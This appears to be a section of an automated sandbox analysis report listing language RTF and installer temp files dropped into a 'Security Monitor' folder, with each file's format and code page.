Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-9JQBQ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-D5R10.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-FJM39.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-GJ503.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-HCDHQ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-JIB0U.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-JQOEF.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-LB8CH.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-LIAVF.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-Q5JCQ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-QNL0J.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-T703I.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-UAI05.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\McAfee_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\eset_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-0AFEM.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-11PFK.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-1354A.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-331R5.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-6DBRC.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-7CNLB.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-7UTBH.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-96I5E.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-9B0OH.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-ARS9D.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-C863T.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-D3BUF.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-D3F9Q.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-DDEPE.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-E8DF2.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-HH2CV.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-JBO5T.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-KPRD8.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-KPTAM.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-NFB9T.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-VKPQ0.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\law_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\norton_warning.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish.lng (copy)
|
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-2FVV0.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-4IGJS.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-64V0H.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-6IA7V.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-860LB.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-9G4QP.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-EDOUQ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-GDH08.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-GS73F.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-H4N3M.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-PMTL9.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-Q42RI.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-R6RKD.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-UFI76.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-UGPGJ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-VCGJJ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\is-VQ9B8.tmp
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\sound.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\video.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\spanish\websites.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish.lng (copy)
|
Unicode text, UTF-8 text, with CRLF line terminators
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\SN.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\activity.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\alarms.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\clipboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\delivery.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-2GDBB.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-4L6KV.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-4PS13.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-5NHI7.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-9I0JU.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-BCP2B.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-GSU6U.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-HEASS.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-J1CFJ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-JAPMR.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-JK2M9.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-KRPDU.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-LF7VD.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-MSRIV.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-OEHGL.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-PCPUJ.tmp
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\is-PL3OH.tmp
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\keyboard.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\logging.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\noPRO.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\noURL.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\scheduler.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\screenshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\settings.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\siteblock.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\turkish\snapshot.rtf (copy)
|
Rich Text Format data, version 1, ANSI, code page 1254, default middle east language ID 1025
|
dropped
|
||
